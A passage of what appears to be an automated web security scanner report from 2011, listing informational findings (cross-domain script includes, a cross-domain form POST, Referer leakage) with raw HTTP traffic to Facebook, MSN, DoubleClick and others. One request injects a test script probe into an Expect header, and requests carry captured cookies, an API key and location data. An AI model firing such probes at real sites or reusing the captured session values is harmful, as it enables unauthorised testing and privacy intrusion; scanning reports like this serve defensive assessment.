Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.41
X-Cnection: close
Date: Sun, 01 May 2011 23:33:41 GMT
Content-Length: 1235

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"washingtonpost.com","channe
...[SNIP]...
ashingtonpost.com\/wp-adv\/jobs4\/html\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/www.washingtonpost.com\/wl\/jobs\/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.87.47
X-Cnection: close
Date: Sun, 01 May 2011 23:34:12 GMT
Content-Length: 1097

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"washingtonpost.com","channe
...[SNIP]...
ashingtonpost.com\/wp-adv\/jobs4\/html\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>
21.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbded924109d9e80834178" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 1,561 others like this.</span><span class="connect_widget_not_connected_text">1561 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=bing.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.bing.com%2F&amp;extra_2=US" target="_blank">Sign Up</a> to se
...[SNIP]...

Request 2

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.38.39
X-Cnection: close
Date: Sun, 01 May 2011 23:32:44 GMT
Content-Length: 8565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbded9cc98688250662275" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 1,562 others like this.</span><span class="connect_widget_not_connected_text">1562 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlik
...[SNIP]...
22. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.assistedliving.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aplaceformom.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.assistedliving.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Cache-Control: private, max-age=7
Expires: Sun, 01 May 2011 23:35:51 GMT
Last-Modified: Sun, 01 May 2011 23:35:41 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 11969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Page Not F
...[SNIP]...
<body id="AssistedLiving-ErrorPage" class="propertyPage homePage var11 plain">
<form method="post" action="http://www.aplaceformom.com/favicon.ico/" id="mainForm">
<div>
...[SNIP]...
23. Cross-domain Referer leakage  previous  next
There are 78 instances of this issue:

23.1. http://0.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw HTTP/1.1
Host: 0.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://clk.atdmt.com/CNT/go/319741851/direct/01/
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSAnalytics=4vfdfecb2d4c0fa370b4247c7f5ca890fe255a7ff3f2d9c16df515059ba889a2c264247fc67cd3b686d59a9dba96fa20d5fcc7df8948e35cc9d47b74a8b87c97eb3554094c90fb1ce99e4b9ec8be3846abbf8e7ed010; expires=Wed, 15 Jun 2011 23:32:50 GMT; domain=.r.msn.com; path=/; httponly
Date: Sun, 01 May 2011 23:32:50 GMT
Connection: close
Content-Length: 191

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://clk.atdmt.com/CNT/go/319741851/direct/01/">here</A>
</BODY>
</HTML>
23.2. http://0.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?ld=4vlfimJWHOSoAG3PfwIh_kJRdllL3F5-o10FPT47q_IWBjrLiueJBDF0U5Dwzq7Y6YfLDJpKC4aJkPg0-hN_0iOcr6o2VXRw93vLwE4JgUrgtSouES4BG05tmlYaeWNIB-FrOo2zqN30arps-BmWfevhnAgRBhd2bQ7zCGpjlfyecT0H8nxj98iGp61_TmM6YA_SkkOpef7dME8BPU_6EHXj8nbGt5hYNuj5Kt5DdAZ6kyXNuYJJTw5rUd00d2p8z9RCFd-9LpGJrjOiEvlhyNEf6ZuSftbgFELTnpFC-ug_c1VAlMa4CLF5Vg2fbAn9ODACF2xxAmY3M9WLROFrG9IPaITglXKXQUhGEMFSUJHZKNqN_vjrCmpcs HTTP/1.1
Host: 0.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MSAnalytics=4vdf366c27486a312210d9bfe02dfcb7c0c7bc93eafacfcbd31f0951f45ba5304205585d2fa608d50164a5d568bbff433f1aa4044f42ccf82369e8e7648050910c3554094cdd2e4983fc56d5214bb2e1feda40a83310

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 01 May 2011 23:32:51 GMT
Connection: close
Content-Length: 278

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907">here</A>
...[SNIP]...
23.3. http://1188110.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1188110.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?ld=4vCHtS_uXEIeo96a3p5ur8EHeK6E2UMMS2W7lvVVqf9k_6OyA1uLOEc_RSovzlSGele_i8oUpTWlxEUal5sKN9XYJRDr8lz8qXyXacB1AVgOENi0_2LjiZcitAhkh4HVfKTfqvGUtT94zc2jM8j-rDjWLK16p15xd37HHeDm02fbhVeYQ2CGNEi2Z-ffIbpb6xdrbLavs7VWl2mJJwMjhvkWqxfQWRvim-AcNJSZ9Dh8LMan_Uhk2ZsYy-QLnVMcZq1wMDg93SjKPG4Pm2PWtPCh8cigXR6sAjkjYXAw9ac5WptSe_2v2xtGp8NowTatUrNVQJTAqhy0D1_1_R0wgjnvJybmAQJmNzPVg9TJ9UUnEt0DGnsIXLqHj2iT1ux4t3VcXvEw0z3qTK HTTP/1.1
Host: 1188110.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MSAnalytics=4vdf366c27486a312210d9bfe02dfcb7c0c7bc93eafacfcbd31f0951f45ba5304205585d2fa608d50164a5d568bbff433f1aa4044f42ccf82369e8e7648050910c3554094cdd2e4983fc56d5214bb2e1feda40a83310

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r?p=7067&t=2&a=31s-2100u&c1=vulnerability management
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSConv=4va5e6de639d56accbb1ed97f6c54c8aa27310e999b329d407a830b846a84681e68a721cceb3999be24ef72b2523b74a4d069b1a142377522b4518e43df690504df34c6a1c45202e9225eccfce06aa5dd8a4f387b24b22c134bf71c97854120943b9c0af30b1828b8d922b29f6ef18039a5638dc9b9a1f0092207a4af6410289b83554094c078414060d2988a62c6b07284cc18f6810; expires=Wed, 15 Jun 2011 23:32:55 GMT; path=/; httponly
Date: Sun, 01 May 2011 23:32:55 GMT
Connection: close
Content-Length: 252

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r?p=7067&t=2&a=31s-2100u&c1=vulnerability management">here</A>
...[SNIP]...
23.4. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B074379b21fb9e765%3B12fae6cbe08,0%3B%3B%3B1478067860,i95YAOw1FwASSlUAAAAAAOsoEwAAAAAAAAAAAAIAAAAAAAsAAQABFeohJAAAAAAAzy0aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASEg8AAAAAAAIAAgAAAAAAB75sri8BAAAAAAAAADg5YmU4OGY2LTc0NWYtMTFlMC04NTc1LTAwMzA0OGQ3MjU5NgA4nyoAAAA=,,http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml,;ord=1304301452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?i95YAOw1FwASSlUAAAAAAOsoEwAAAAAAAAAAAAIAAAAAAAsAAQABFeohJAAAAAAAzy0aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASEg8AAAAAAAIAAgAAAAAA13-dmzYzH0DXf52bNjMfQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtSm.pCvQGCiKM6CiSfw5MkV5RbarJNfJKETvoAAAAAA==,,http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml,Z%3D300x250%26s%3D1521132%26_salt%3D2512947330%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.japanator.com%252Felephant%252Fsignup.phtml%26r%3D1,89be88f6-745f-11e0-8575-003048d72596
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 01:57:34 GMT
Content-Length: 855

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ads.bluelithium.com/clk?2,13%3B074379b21fb9e765%3B12fae6cbe08,0%3B%3B%3B1478067860,i95YAOw1FwASSlUAAAAAAOsoEwAAAAAAAAAAAAIAAAAAAAsAAQABFeohJAAAAAAAzy0aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASEg8AAAAAAAIAAgAAAAAAB75sri8BAAAAAAAAADg5YmU4OGY2LTc0NWYtMTFlMC04NTc1LTAwMzA0OGQ3MjU5NgA4nyoAAAA=,,http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml,http://ad.doubleclick.net/click;h=v8/3afb/c/181/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
23.5. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaabd%3B12fade8e939,0%3B%3B%3B4257954862,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAOOnorS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,;ord=1304292813? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe
